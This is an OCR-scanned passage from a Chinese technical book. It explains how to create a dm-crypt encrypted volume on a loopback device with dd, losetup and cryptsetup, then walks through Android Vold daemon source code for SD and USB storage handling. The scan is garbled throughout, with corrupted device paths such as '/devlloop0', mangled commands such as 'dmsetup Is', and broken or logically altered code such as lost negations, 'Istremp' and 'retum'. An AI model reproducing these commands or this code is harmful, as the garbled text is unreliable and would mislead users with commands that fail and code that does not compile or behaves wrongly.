立 一 个 空 磁盘 映像 ,然后 将 该 映像 作为 回 送 设备 来 装载 即 可 。 例如 下 面 的 指令 新 建 了 一 个 大 小 为 100 MB 的 
磁盘 映像 ， 该 映像 名 字 为 virtual.img。 要 想 改 变 其 大 小 ， 可 以 改变 count 的 值 。 
#dd if=/dev/zero of=/virtual.img bs=1M count=100 
接 下 来 ， 利 用 losetup 命令 将 该 映像 和 一 个 回 送 设备 联系 起 来 。 
#losetup /devlloop0 /virtual.img 
现在 已 经 得 到 了 一 个 虚拟 的 块 设备 , 位 于 /dev/loop0 目录 下 , 并 且 能 够 如 同 使 用 其 他 设备 那样 来 使 用 它 。 
(4) 设置 块 设备 
准备 好 物理 块 设备 〈 例 如 /dewhdal ) 或 者 是 虚拟 块 设备 〈 像 前 面 那样 建立 了 回 送 映像 ， 并 利用 
device-mapper 将 其 作为 加 密 的 逻辑 卷 加 载 ) 后 ,就 可 以 进行 块 设备 配置 工作 了 。 接 下 来 使 用 cryptsetup KE 
立 逻辑 卷 ， 并 将 其 与 块 设备 进行 捆绑 。 
#cryptsetup -y create ly EFS device name 
Rep, 1у EFS 是 新 建 的 逻辑 卷 的 名 称 ， 并 且 最 后 一 个 参数 device name 必须 是 将 用 作 加 密 卷 的 块 设备 。 
要 想 使 用 前 面 建立 的 回 送 映像 作为 虚拟 块 设备 ， 需 要 运行 如 下 命令 。 
#cryptsetup -y create ly EFS /dev/loop0 
无 论 是 使 用 物理 块 设备 还 是 虚拟 块 设备 ， 程 序 都 会 要 求 输入 逻辑 卷 的 口令 ，-y 的 作用 在 于 确保 两 次 输 
入 口令 无 误 。 一旦 口令 弄 错 ， 就 会 把 自己 的 数据 锁 住 。 为 了 确认 逻辑 卷 是 否 已 经 建立 ， 可 以 使 用 下 列 命令 
#dmsetup Is 
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只 要 该 命令 列 出 了 逻辑 卷 ， 就 说 明 已 经 成 功 建立 了 逻辑 卷 。 根 据 机 器 的 不 同 ， 设 备 号 可 能 会 有 所 不 同 。 
device-mapper 会 把 它 的 虚拟 设备 装载 到 /dewmapper 目录 下 面 ， 所 以 对 应 的 虚拟 块 设备 应 该 是 
/dewmapperly_EFS。 这 尽管 用 起 来 和 其 他 块 设备 没什么 不 同 ， 但 是 实际 上 却 是 经 过 透明 加 密 的 。 

如 同 物理 设备 一 样 ， 用 户 也 可 以 在 虚拟 设备 上 创建 文件 系统 ， 例 如 下 面 的 命令 。 

#mkfs.ext3 /dev/mapper/ly EFS 

现在 可 以 为 新 的 虚拟 块 设备 建立 一 个 装载 点 ， 然 后 将 其 装载 ， 具 体 命令 如 下 所 示 。 

#mkdir /mnt/ly EFS 

#mount /dev/mapper/ly EFS /mnt/ly EFS 

这 样 用 户 能 够 利用 下 面 的 命令 查看 其 装载 后 的 情况 。 

#df -h /mnt/ly_EFS 

用 户 通 过 上 述 操作 步骤 后 可 以 看 到 装载 的 文件 系统 ， 尽 管 看 起 来 与 其 他 文件 系统 无 异 ， 但 实际 写 到 
/mnt/ly_EFS/ 下 的 所 有 数据 在 数据 写 入 之 前 ， 都 是 经 过 透明 的 加 密 处 理 后 才 写 入 磁盘 的 。 所 以 说 ， 从 该 处 读 
取 的 数据 都 是 密 文 。 
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#umount /mnt/y EFS 

即便 已 经 扼 载 了 块 设备 ， 在 dm-crypt 中 仍然 被 视 为 是 一 个 虚拟 设备 。 如 果 再 次 运行 命令 dmsetup ls 后 ， 
将 会 看 到 该 设备 依然 被 列 出 。 因 为 dm-crypt 缓存 了 口令 ， 所 以 机 器 上 的 其 他 用 户 不 需要 知道 口令 就 能 重新 
装 裁 该 设备 。 为 了 避免 这 种 情况 发 生 ， 必 须 在 卸载 设备 后 从 dm-crypt 中 删除 该 设备 ， 有 具体 命令 如 下 所 示 。 

#cryptsetup remove ly EFS 

此 后 加 密 文件 系统 将 被 彻底 清除 ， 要 想 再 次 装载 ， 用 户 必 须 再 次 输入 口令 。 

(6) 重新 装载 加 密 设备 

在 印 载 加 密 设 备 后 ,用户 很 可 能 还 需 作 为 普通 用 户 来 装载 它们 。 为 了 简化 该 工作 ， 需 要 在 /ete/fstab 文件 
"Pisa FAR. 

/dev/mapper/ly_EFS /mnt/ly_EFS ext3 noauto,noatime 0 0 

除 此 之 外 ， 也 可 以 通过 建立 脚本 的 方式 来 完成 dm-crypt 设备 的 创建 和 装载 工作 ， 方 法 是 用 实际 设备 的 
名 称 或 文件 路 径 来 奉 换 /dewDEVICENAME， 具 体 命令 如 下 所 示 。 

#l/bin/sh 

cryptsetup create ly_EFS /dev/DEVICENAME 

mount /dev/mapper/ly EFS /mnt/ly_EFS 

如 果 使 用 的 是 回 送 设备 ， 用 户 还 可 以 利用 脚本 来 捆绑 设备 ， 具 体 脚本 如 下 所 示 。 

#!/bin/sh 

losetup /dev/loop0 ~/virtual.img 

cryptsetup create ly EFS /dev/loopO 

mount /dev/mapper/ly EFS /mnt/ly EFS 
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ERU 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 6 章 \Vold 机 制 介绍 .avi 

Vold 是 Volume Daemon 存储 类 的 守护 进程 ， 作 为 Android 的 一 个 本 地 服务 ， 负 责 处 理 诸如 SD、USB 
等 存储 类 设备 的 插 拔 等 事件 .Vold 服务 由 Volume Manager 统 一 管控 ,将 具体 任务 分 别 分 派 给 netlinkManager、 
commandListener、directVolume 和 Volume 完成 。 在 本 节 的 内 容 中 ， 将 详细 讲解 Vold 加 密 机 制 的 基本 知识 。 
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6.2.1 Vold 机 制 基础 


Vold 服务 向 下 通过 socket 机 制 与 底层 驱动 交互 ， 向 上 通过 INI, intent. socket 和 doCommand 等 机 制 与 
Java Framework 交互 。Vold 服务 在 Android 系统 中 的 具体 架构 如 图 6-1 所 示 。 
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图 6-1 Vold 服务 的 具体 架构 


当初 始 化 Android 系统 时 会 开启 Vold 本 地 服务 ，Vold 会 在 /dev/block 目录 下 创建 vold 文件 夹 ， 并 分 别 
开启 VolumeManager、NetlinkManager 和 CommandListener。 由 此 可 见 ， 在 Android 系统 中 ，Vold 机 制 的 功 
能 如 下 所 示 。 

о 接受 内 核发 送 的 关于 外 部 存储 设备 加 载 和 删除 的 信息 ， 然 后 将 信息 发 送 给 Framework 层 的 

MountService 。 
口 执行 MountService 发 送 的 命令 。 
在 Android 系统 中 ，Vold 机 制 实 现 上 述 功 能 的 基本 流程 如 下 所 示 。 
(1) 在 文件 system/core/vold/vold.c 中 建立 和 Framework 层 的 通信 ， 具 体 代 码 如 下 所 示 。 
if ((door_sock = android get control socket(VOLD SOCKET)) < 0) ( 
LOGE("Obtaining file descriptor socket '%s' failed: %s", 
VOLD SOCKET, strerror(errno)); 
exit(1); 
) 


if (listen(door_sock, 4) < 0) ( 
LOGE("Unable to listen on fd '%d' for socket '%s': %s", 
door sock, VOLD SOCKET, strerror(errno)); 
exit(1); 


} 
通过 上 述 代 码 可 知 ， 在 init 进程 中 创建 了 VOLD_SOCKET, MX android get control socket0 的 主要 功 
能 是 获取 VOLD SOCKET 的 文件 描述 符 ， 函 数 listen0 的 主要 功能 是 监听 来 自 其 他 Framework 层 的 Socket 


e) 
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连接 请 求 。 
(2) 当 开 启 Framewok 层 和 MountService 后 会 创建 一 个 新 的 线程 ,这 一 点 在 类 MountService 的 构造 方 
法 中 实现 ， 具 体 代码 如 下 所 示 。 
if (action.equals(Intent.ACTION_BOOT_COMPLETED)) ( 
Thread thread = new Thread(mListener, MountListener.class.getName()); 


thread.start(); 
} 
类 MountListener 实现 了 Runnable 接口 ， 在 它 继 承 的 方法 run0) 中 创建 了 一 个 无 限 循环 ， 具 体 代 码 如 下 
所 示 。 
while (true){ 
listenToSocket(); 
) 


(3) 在 方法 listenToSocket0 中 实例 化 一 个 本 地 的 LocalSocket ， 目 的 是 与 Vold 实现 通信 并 建立 与 
VOLD SOCKET 的 连接 。 然 后 再 建立 一 个 文件 输入 流 ， 用 于 保存 Vold 传 来 的 mes 到 buff 中 。 最 后 ， 在 一 
个 无 限 循环 中 读 取 buff 的 内 容 ， 并 执行 handleEvent0 函 数 ， 具 体 代码 如 下 所 示 。 

socket = new LocalSocket(); 

LocalSocketAddress address = new LocalSocketAddress(VOLD SOCKET, 
LocalSocketAddress.Namespace.RESERVED); 

socket.connect(address); 

InputStream inputStream = socket.getlnputStream(); 

mOutputStream = socket.getOutputStream(); 


while (true) { 
int count = inputStream.read(buffer); 
if (count < 0) break; 
int start = 0; 
for (int i = 0; і < count; i++) ( 
if (buffer[i] == 0) { 
String event = new String(buffer, start, i - start); 
handleEvent(event); 
start =i + 1; 


} 
Em 在 函数 handleEvent0 中 通过 if -else 诸 句 来 处 理 传递 来 的 事件 ， 具 体 代 码 如 下 所 示 。 
if (event.equals(VOLD EVT UMS ENABLED)) { 
} eof (eventequalssVOLD EVT UMS DISABLED)) ( 
} desi (eventequalsVOLD EVT EXTERNAL UMS CONNECTED)) { 
ПРЕТРЕС 


} else if (event.equals(VOLD EVT UMS CONNECTED)) ( 


mService.notifyUmsConnected(path); 
} else if (event.equals("VOLD EVT EXTERNAL UMS DISCONNECTED)) { 


这 样 ， 将 处 理 之 后 需要 执行 的 命令 成 功 发 送 给 了 Vold。 到 现在 为 止 ， 就 建立 了 Vold 与 MountService 
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之 间 的 通信 。 

(5) 接 下 来 开始 建立 与 内 核 的 socket 通信 ， 首 先 创建 一 个 uevent_sock， 建 立 与 内 核 的 通信 。 函 数 
setsockopt() 的 主要 功能 是 设置 uevent_sock 的 选项 ， 函 数 bind0 的 主要 功能 是 将 内 核 的 socket 与 uevent sock 
进行 地 址 的 绑 定 。 具 体 代 码 如 下 所 示 。 

Intent intent = new Intent(Intent.ACTION_UMS CONNECTED); 
mContext.sendBroadcast(intent); 


if ((uevent_sock = socket(PF_NETLINK, 
SOCK DGRAM,NETLINK KOBJECT UEVENT)) < 0) { 


} 
if (setsockopt(uevent sock, SOL SOCKET, SO RCVBUFFORCE, &uevent sz, 
sizeof(uevent sz)) < 0) ( 


} 
if (bind(uevent_sock, (struct sockaddr *) &nladdr, sizeof(nladdr)) < 0) { 


} 
(6) 接 下 来 开始 挂 载 现 有 存储 设备 ， 函 数 volmgr_bootstrap() 首 先 解析 配置 文件 vold.conf， 然 后 将 需要 
挂 载 的 设备 信息 放 在 一 个 全 局 变量 的 链表 vol root 中 ， 有 具体 代码 如 下 所 示 。 
static volume t*vol root = NULL; 
(7) 开始 挂 载 mmc/sdcard 卡 ， 函 数 dipatch_uevent() 的 功能 是 根据 uevent->subsystem 确定 uevent 处 理 
的 句柄 ， 具 体 代码 如 下 所 示 。 
volmgr bootstrap(); 
simulate uevent() 
if ((rc = volmgr readconfig("/system/etc/vold.conf")) < 0) ( 
LOGE("Unable to process config"); 
retum rc; 


) 
struct uevent ( 
const char *action; 
const char *path; 
const char *subsystem; 
const char *firmware; 
int major; 
int minor; 
Е 
这 样 在 MountService 开启 之 后 实现 最 终 的 挂 载 操作 。 
(8) 通过 函数 ums_bootstrap() 处 理 USB 中 的 大 容量 存储 ， 然 后 实现 主 服 务 功能 ， 当 所 有 的 文件 描述 符 
都 没 改 变 时 会 阻塞 线程 ， 具 体 代 码 如 下 所 示 。 
struct uevent dispatch { 
char *subsystem; 
int (* dispatch) (struct uevent *); 


k 

while(1) ( 
FD ZERO(&read fds); /初始 化 文件 描述 集合 
FD_SET(door_sock, &read fds); Ilf доог sock 加 入 文件 描述 集 
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if (door_sock > max) 

max = door sock; 
FD SET(uevent sock, &read fds); 1/4 uevent. sock 加 入 文件 描述 集 
if (uevent_sock > max) 

max = uevent_sock; 
if (w sock 1= -1) { 

FD_SET(fw_sock, &read fds); II fw. sock 加 入 文件 描述 集 

if (fw sock > max) 

max = fw_sock; 


} 
// 当 所 有 的 文件 描述 符 都 没 改变 时 ， 阻 塞 线程 
if (rc = select(max + 1, &read_fds, NULL, NULL, &to)) < 0) { 
LOGE("select() failed (%s)", strerror(errno)); 


sleep(1); 
continue; 
} 
if (Irc) ( 
continue; 


} 
/检测 如 果 是 door_sock， 检 测 与 Framework 的 连接 ， 并 发 送 msg 
if(FD ISSET(door sock, &read_fds)) { 
struct sockaddr addr; 
socklen_t alen; 
alen = sizeof(addr); 
if (fw sock != -1) { 
LOGE("Dropping duplicate framework connection"); 
int tmp = accept(door_sock, &addr, &alen); 
close(tmp); 
continue; 
} 
if (fw sock = accept(door sock, &addr, &alen)) < 0) { 
LOGE("Unable to accept framework connection (%s)", 
strerror(errno)); 
} 
LOG_VOL("Accepted connection from framework"); 
/* for iNand */ 
volmgr_usb_bootstrap(); 
if ((rc = volmgr_send_states()) < 0) { 
LOGE("Unable to send volmgr status to framework (%d)", rc); 
} 
} 
// 如 果 是 fw. sock, #147 Framework 传 来 的 命令 
if(FD ISSET(fw sock, &read fds)) ( 
if ((rc = process framework command(fw sock)) < 0) ( 
if (rc == -ECONNRESET) ( 
LOGE("Framework disconnected"); 
close(fw sock); 
fw sock = -1; 
)else ( 
LOGE("Error processing framework command (%s)", 
strerror(errno)); 
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} 


} 
// 如 果 是 uevent_sock， 产 生 一 个 uevent 事件 
if(FD ISSET(uevent sock, &read fds)) ( 
if ((rc = process uevent message(uevent sock)) < 0) ( 
LOGE("Error processing uevent msg (%s)", strerror(ermo)); 
} 


} 
} // while 
6.2.2 Vold 的 主要 功能 


经 过 6.2.1 节 内 容 的 学 习 ， 可 以 了 解 到 Vold 的 主要 功能 如 下 所 示 。 

(1) 创建 连接 功能 

当 Vold 作为 一 个 守护 进程 时 ， 一 方面 接受 驱动 的 信息 ， 并 把 信息 传 给 应 用 层 ， 另 一 方面 接受 上 层 的 命 
令 并 完成 相应 操作 。 上 述 操作 的 连接 一 共有 两 条 。 

口 vold socket: 负责 vold 与 应 用 层 的 信息 传递 。 

O 访问 udev 的 socket: 负责 vold 与 底层 的 信息 传递 。 

上 述 两 个 连接 都 是 在 进程 的 一 开始 完成 创建 的 。 

(2) 引导 功能 

在 启动 Vold 时 对 现 有 外 设 存储 设备 进行 处 理 。 首 先 加 载 并 解析 vold.conf， 并 检查 挂 载 点 是 否 已 经 被 挂 
载 ， 然 后 执行 MMC FHERR: 最后， 处 理 USB 的 大 容量 存储 。 

(3) 事件 处 理 功能 

通过 监听 两 个 连接 的 方式 实现 对 动态 事件 的 处 理 ， 以 及 对 上 层 应 用 操作 的 响应 。 

Vold 机 制 的 makefile 文件 位 于 /system/vold/Android.mk， 入 口 函数 在 文件 main.cpp 中 ， 有 具体 代码 如 下 所 示 。 

int main() ( 


VolumeManager *vm; 
CommandListener *cl; 
NetlinkManager *nm; 


SLOGI("Vold 2.1 (the revenge) firing up"); 


mkdir("/dev/block/vold", 0755); 


if ((vm = VolumeManager::Instance())) { 
SLOGE("Unable to create VolumeManager"); 


exit(1); 
X 
/创建 一 个 VolumeManager 实例 ， 具 体 的 构造 函数 位 于 文件 VolumeManager.cpp 中 


if ((nm = NetlinkManager::Instance())) { 
SLOGE("Unable to create NetlinkManager"); 


exit(1); 
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/实例 化 一 个 NetlinkManager 对 象 ， 具 体 的 构造 函数 位 于 文件 NetlinkManager.cpp 中 


cl = new CommandListener(); 


жоско К К ОК О КЕ КО II SOI III IIIT III II III III III 


/构造 一 个 CommandListener 对 象 ， 这 个 类 定义 在 文件 CommandListener.h 中 ， 继 承 了 类 Framework 
Listener， 这 个 类 定义 在 sysutils/FrameworkListener.h 中 
/这 个 类 又 继承 了 类 SocketListener， 这 个 类 定义 在 文件 SocketListener.h 中 ， 下 面 看 文件 /system/core/ 
libsysutils/src/SocketListener.cpp 
//SocketListener::SocketListener(const char *socketName, bool listen) { 
mListen = listen; 
mSocketName = socketName; 
mSock = -1; 
pthread mutex init(&mClientsLock, NULL); 
mClients = new SocketClientCollection(); 
Iltypedef android::List<SocketClient *» SocketClientCollection; SocketClientCollection 是 一 
个 SocketClient 类 对 象 的 集合 
Tenn 
TE X {F/system/core/libsysutils/src/FrameworkListener.cpp 中 定义 了 FrameworkListener 类 的 构造 函数 ， 具 
体 代 码 如 下 所 示 。 
FrameworkListener::FrameworkListener(const char *socketName) : 
SocketListener(socketName, true) ( 
mCommands = new FrameworkCommandCollection(); 
Itypedef android::List<FrameworkCommand *> FrameworkCommandCollection; 
}7 
/下 面 是 CommandListener 的 构造 函数 
CommandListener::CommandListener() : 
FrameworkListener("vold") ( 
registerCmd(new DumpCmd()); 
registerCmd(new VolumeCmd()); 
registerCmd(new AsecCmd()); 
registerCmd(new ShareCmd()); 
registerCmd(new StorageCmd()); 
registerCmd(new XwarpCmd()); 
SIN 
此 处 会 调用 其 继承 类 的 protected 成 员 函 数 registerCmd()， 其 参数 是 一 个 指向 类 FrameworkCommand 的 
指针 。 类 CommandListener 包含 儿 个 私有 的 内 部 类 。 
class DumpCmd : public VoldCommand 
11 class VolumeCmd : public VoldCommand 
class ShareCmd : public VoldCommand 
class AsecC md : public VoldCommand 
class StorageC md : public VoldCommand 
class XwarpCmd : public VoldCommand 
接 下 来 开始 实例 化 一 个 DumpCmd， 上 有 具体 代码 如 下 所 示 。 
CommandListener::DumpCmd::DumpCmd() : 
VoldCommand("dump") ( 


} 
其 父 类 在 文件 system/vold/VoldCommand.cpp 中 定义 ， 有 具体 代码 如 下 所 示 。 
VoldCommand::VoldCommand(const char *cmd) : 

FrameworkCommand(cmd) ( 
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其 父 类 的 代码 如 下 所 示 。 
FrameworkCommand::FrameworkCommand(const char *cmd) ( 
mCommand = cmd; 
} 
同样 道理 ， 创 建 VolumeCmd、AsecCmd、ShareCmd、StorageCmd 和 XwarpCmd 的 过 程 也 是 如 此 ， 其 


私有 成 员 mCommand 分 别 取 值 为 dump、volume、asec、share、storage 和 xwarp. 注册 指令 的 代码 如 下 所 示 。 
void FrameworkListener::registerCmd(FrameworkCommand *cmd) ( 
mCommands->push_back(cmd); 
) 
由 此 可 见 ，mCommands 指向 了 FrameworkCommandCollection， 而 FrameworkCommandCollection 是 
个 包含 FrameworkCommand 指针 的 链表 ， 对 应 的 描述 代码 如 下 所 示 。 
typedef android::List<FrameworkCommand *> FrameworkCommandCollection 
所 以 在 此 将 创建 的 FrameworkCommand 指针 对 象 压 入 链表 存储 起 来 ， 对 应 的 描述 代码 如 下 所 示 。 
vm->setBroadcaster((SocketListener *) cl); 
nm->setBroadcaster((SocketListener *) cl); 
if (vm->start()) { 
SLOGE("Unable to start VolumeManager (%s)", strerror(ermo)); 
exit(1); 
} 
WNm->start() 始 终 返回 0， 什么 都 不 做 


if (process_config(vm)) ( 
SLOGE("Error reading configuration (%s)... continuing anyways", strerror(errno)); 


} 


if (nm->start()) { 
SLOGE("Unable to start NetlinkManager (%s)", strerror(errno)); 
exit(1); 
} 
而 nm->start0 会 调用 类 NetlinkManager 中 的 start0 方 法 ， 主 要 代码 如 下 所 示 。 
int NetlinkManager::start() { 
struct sockaddr_nl nladdr; 
int sz = 64 * 1024; 


memset(&nladdr, 0, sizeof(nladdr)); 
nladdr.nl family = AF_NETLINK; 
nladdr.nl_pid = getpid(); 

nladdr.nl groups = Ох; 


if ((mSock = socket(PF NETLINK, 
SOCK DGRAM,NETLINK KOBJECT UEVENT)) < 0) ( 
SLOGE("Unable to create uevent socket: 96s", strerror(errno)); 
return -1; 


} 


if (setsockopt(mSock, SOL SOCKET, SO RCVBUFFORCE, &sz, sizeof(sz)) < 0) { 
SLOGE("Unable to set uevent socket options: %s", strerror(errno)); 
return -1; 
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} 


if (bind(mSock, (struct sockaddr *) &nladdr, sizeof(nladdr)) < 0) ( 
SLOGE("Unable to bind uevent socket: %s", strerror(errno)); 
return -1; 


} 
/创建 一 个 socket 用 于 内 核 空间 和 用 户 空间 的 异步 通信 ， 监 控 系 统 的 hotplug 事件 


mHandler = new NetlinkHandler(mSock); 


if (mHandler->start()) ( 
SLOGE("Unable to start NetlinkHandler %s", strerror(errno)); 
return -1; 


} 

在 上 述 代码 中 ， 成 员 mListen 用 来 判定 是 否 监 听 套 接 字 ，Netlink 套 接 字 属于 udp 套 接 字 ， 也 是 非 监 听 
套 接 字 。 如 果 该 套 接 字 有 数据 到 来 ， 则 调用 函数 runListener( 读 取 数 据 ， 具 体 代 码 如 下 所 示 。 
void SocketListener::runListener() ( 
while(1) 切 无 限 循环 ， 一 直 监 听 
SocketClientCollection::iterator it; 
fd setread fds; 
int rc = 0; 
int max = 0; 
FD ZERO(&read fds); /清空 文件 描述 符 集 read_fds 
if (mListen) ( 
max = mSock; 
FD_SET(mSock, &read fds); /添加 文件 描述 符 到 文件 描述 符 集 read_fds 
} 


FD SET(mCtrlPipe[0], &read fds); /添加 管道 的 读 取 端 文件 描述 符 到 read_fds 
if (mCtriPipe[0] > max) 
max = mCtrlPipe[0]; 


pthread_mutex_lock(&mClientsLock);// 对 容器 mClients 的 操作 需要 加 锁 
for (it = mClients->begin(); it != mClients->end(); ++it){ 
FD_SET((*it)->getSocket(), &read fds); /遍历 容器 mClients 的 所 有 成 员 ， 调 用 内 联 函 数 getSocket() 
获取 文件 描述 符 ， 并 添加 到 文件 描述 符 集 read_fds 
if ((*it)->getSocket() > max) 
max = (*it)->getSocket(); 
) 
pthread mutex unlock(&mClientsLock); 


if ((rc = select(max + 1, &read fds, NULL, NULL, NULL)) < 0) ( /等 待 文件 描述 符 中 某 一 文件 描述 符 或 者 
socket 有 数据 到 来 
SLOGE("select failed (%s)", strerror(errno)); 
sleep(1); 
continue; 
) else if (Irc) 
continue; 
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if (FD ISSET(mCtriPipe[0], &read fds)) 
break; 


if (mListen && FD ISSET(mSock, &read fds)) { 监 听 套 接 字 处 理 
struct sockaddr addr; 
socklen_t alen = sizeof(addr); 
int c; 


if ((c = accept(mSock, &addr, &alen)) < 0) {// 接 收 连 接 请 求 ， 建 立 连 接 ， 如 果 成 功 .c 即 为 建立 连接 后 的 数 
据 交 换 套 接 字 ， 将 其 添加 到 mClient 容器 
SLOGE("accept failed (%s)", strerror(errno)); 
sleep(1); 

continue; 

} 
pthread mutex lock(&mClientsLock); 
mClients-»push back(new SocketClient(c)); 

pthread mutex unlock(&mClientsLock); 
} 


do {// 非 监听 套 接 字 处 理 
pthread mutex lock(&mClientsLock); 
for (it = mClients->begin(); it = mClients->end(); it) ( 
int fd = (*it)-»getSocket(); 
if (FD_ISSET(fd, &read_fds)) {// 调 用 相应 的 数据 读 取 函 数 ， 读 取 数 据 
pthread_mutex_unlock(&mClientsLock); 
if (lonDataAvailable(*it)) { 
close(fd); 
pthread mutex lock(&mClientsLock); 
delete *it; 
it = mClients->erase(it); 
pthread mutex unlock(&mClientsLock); 


} 
FD_CLR(fd, &read fds); 


continue; 
} 
} 
pthread_mutex_unlock(&mClientsLock); 
} while (0); 


} 


} 
接 下 来 看 函数 onDataAvailable()， 此 函数 是 在 类 SocketListener 中 定义 的 纯 虚 函数 。 在 Android 系统 中 
-共有 5 个 类 继承 于 SocketListener 类 ， 并 对 函数 onDataAvailable() 进 行 了 实现 ， 具 体 说 明 如 下 所 示 。 


DhepListener (system\core\nexus ) 


FrameworkListener (system coreMibsysutils src ) 
NetlinkListener (system coreVibsysutils src ) 
SupplicantListener (system\core\nexus ) 


ooooo 


TiwlanEventListener (system\core\nexus ) 
为 了 处 理 Netlink 创建 的 套 接 字 ， 需 要 由 NetlinkHandler 对 象 调用 startListen(0) 函 数 ， 并 开启 相关 线程 。 
因为 类 NetlinkHandler 继承 了 类 NetlinkListener， 所 以 此 处 调用 的 是 类 NetlinkListener 的 成 员 函 数 
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onDataAvailable(). FA onDataAvailable() 在 文件 system\core\libsysutils\sre\NetlinkListener.cpp 中 定义 ， 有 具体 
代码 如 下 所 示 。 
bool NetlinkListener::onDataAvailable(SocketClient *cli) 


{ 
int socket = cli->getSocket(); 
int count; 


if ((count = recv(socket, mBuffer, sizeof(mBuffer), 0)) < 0) ( ) // 读 取 数 据 


NetlinkEvent *evt = new NetlinkEvent(); 
if (!evt->decode(mBuffer, count)) ( ) 


onEvent(evt); //NetlinkListener 类 定义 了 纯 虚 函数 ， 其 子 类 NetlinkHandler 对 其 进行 了 实现 ， 所 以 此 处 调 
用 子 类 NetlinkHandler 的 onEvent() 函 数 
out: 

delete evt; 

return true; 


) 
再 看 文件 system/vold/NetlinkHandler.cpp 中 的 函数 onEvent()， 通 过 此 函数 返回 到 Vold 进程 ， 也 就 标志 
着 Android 系统 中 的 Vold 模块 的 Netlink event 传递 机 制 分 析 完 成 ， 具 体 代 码 如 下 所 示 。 
void NetlinkHandler::onEvent(NetlinkEvent *evt) ( 
VolumeManager *vm = VolumeManager::Instance(); 
const char *subsys = evt-»getSubsystem(); 


if (Isubsys) ( 
SLOGW/("No subsystem found in netlink event"); 
return; 

) 


if (Istremp(subsys, "block")) ( 
vm->handleBlockEvent(evt); 
} else if (Istremp(subsys, "switch")) { 
vm->handleSwitchEvent(evt); 
#if defined(SLSI_S5PC110) && defined(BOARD_USES_HDMI) 
} else if (Istremp(subsys, "video4linux")) { 
vm->handlevideo4linuxEvent(evt); 
#endif 
) else if (!strcmp(subsys, "battery")) ( 
) else if (Istremp(subsys, "power supply") { 


) 
} 
接 下 来 开始 分 析 真正 的 Vold 管理 部 分 ， 主 要 代码 如 下 所 示 。 
return 0; 
} 
“ff 
return 0; 


} 
coldboot("/sys/block");// 冷 启动 ，vold 错过 了 一 些 uevent, 重 新 触发 。 向 sysfs 的 uevent 文件 写 入 addin 字符 
也 可 以 触发 sysfs 事件 ， 相 当 于 执行 了 一 次 热 插 拔 
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FILE *fp; 
char state[255]; 
I[:&38//sys/devices/virtual/switch/usb mass storage/state 状态 信息 ， 并 发 送 广播 
if (fp = fopen("/sys/devices/virtual/switch/usb mass storage/state", 
"»t 
if (fgets(state, sizeof(state), fp)) { 
if (!strncmp(state, "online", 6)) { 
vm->notifyUmsConnected(true); 
) else ( 
vm->notifyUmsConnected(false); 
} 
) else { 
SLOGE("Failed to read switch state (%s)", strerror(errno)); 
} 


fclose(fp); 
) else { 

SLOGW("No UMS switch available"); 
} 


E 
Il coldboot("/sys/class/switch"); 


if (cl->startListener()) { 
SLOGE("Unable to start CommandListener (%s)", strerror(errno)); 
exit(1); 


11 Eventually we'll become the monitoring thread 
while(1) ( 

Sleep(1000); 
) 


SLOGI("Vold exiting"); 
exit(0); 
) 


6.2.3 Vold 处 理 SD/USB 的 流程 

在 Android 系统 中 ，Vold 机 制 的 主要 作用 是 处 理 USB 和 SD 文件 的 加 密 应 用 。 在 接 下 来 的 内 容 中 ， 将 
详细 分 析 Vold 机 制 处 理 SD 和 USB 应 用 的 基本 流程 。 

1. 分 析 主 流程 

主流 程 主 函数 在 文件 system/core/vold/vold.c 中 定义 ， 主 要 代码 如 下 所 示 。 


int main(int argc, char **argv) 


{ 
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mkdir("/dev/block/vold", 0755); 


n 
* Bootstrap 
dt 
bootstrap = 1; 
11 Volume Manager 
volmgr bootstrap(); 
/ SD Card system 
mmc bootstrap(); 


11 Switch 
Switch bootstrap(); 
bootstrap = 0; 


) 
在 上 述 代 码 中 ，volmgr_ bootstrap 表示 加 载 配置 文件 ，mmc_bootstrap 表示 挂 载 mmc/sdcard , 
switch_bootstrap 表示 连接 USB。 


2. 加 载 配置 文件 


在 文件 system/core/vold/Volmgr.c 中 实现 加 载 配置 文件 功能 ， 主 要 代码 如 下 所 示 。 

int volmgr_bootstrap(void) 

{ 

int re; 
if (rc = volmgr readconfig("/system/etc/vold.conf")) < 0) { 
LOGE("Unable to process config"); 
return rc; 
} 
n 
* Check to see if any of our volumes is mounted 
"f. 
volume t *v = vol root; 
while (v) { 
if ( mountpoint mounted(v-»mount point)) ( 
LOGW("Volume '%s' already mounted at startup", v-»mount point); 
v-»state = volstate mounted; 
} 
V = v->next; 
} 
return 0; 

} 

上 述 代 码 的 功能 是 ， 调 用 函数 volmgr readconfig() 读 取 配 置 文件 /system/etc/vold.conf， 并 用 
_mountpoint_mounted 检查 设备 是 否 挂 载 , 如 果 挂 载 则 将 状态 改 为 volstate_mounted。 函数 volmgr readconfig() 
的 主要 代码 如 下 所 示 。 

static int volmgr readconfig(char *cfg path) 


{ 
cnode *root = config_node("", ""); 
cnode “node; 


(m, 


ace xen Gu NN 


config load file(root, cfg_path); 
node = root-»first child; 
while (node) ( 
if (Istrmcmp(node-»name, "volume ", 7)) 
volmgr config volume(node); 
else 
LOGE("Skipping unknown configuration node '%s", node->name); 
node = node->next; 
} 
return 0; 
} 
CD 读 取 配 置 文件 
函数 config load file 的 功能 是 将 配置 文件 的 信和 4 
结构 的 定义 如 下 所 示 。 


卖 出 来 , 然后 以 cnode 链表 结构 的 方式 进行 保存 .cnode 


struct cnode 

{ 
cnode “next; 
cnode “first_child; 
cnode “last_child; 


const char *name; 
const char *value; 
X 
假如 配置 文件 /systemy/etc/vold.conf 的 内 容 如 下 所 示 。 
volume sdcard { 
## This is the direct uevent device path to the SD slot on the device 


media path Idevices/platform/msm sdcc.2/mmc host/mmc1 
emu media path Idevices/platform/goldfish mmc.0/mmc host/mmcO 
media type mmc 

mount point Isdcard 

ums path Idevices/platform/usb mass storage/lunO 


} 
则 读 到 链表 后 的 形式 如 下 所 示 。 
Root —— first child -—- name = volume sdcard 
|— next -— name = media path 
|-— value = /devices/platform/msm sdcc.2/mmc host/mmc1 
|-- next — name = emu media path 
| 一 value = /devices/platform/goldfish_mmc.0 ... 
|— next -一 - … 
这 样 会 按照 上 述 格式 保存 配置 文件 的 信息 。 
(2) 配置 文件 分 析 
函数 volmgr_config_volume() 的 功能 是 将 root 链表 结构 的 信息 存储 到 vol root 链表 结构 中 的 对 应 项 。 
vol_root 结构 的 定义 代码 如 下 所 示 。 
typedef struct volume { 
char *media paths|'VOLMGR MAX MEDIAPATHS PER VOLUME]; 
media type tmedia type; 
char *mount point; 
char *ums path; 
struct devmapping *dm; 
pthread mutex tlock; 
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volume state t state; 

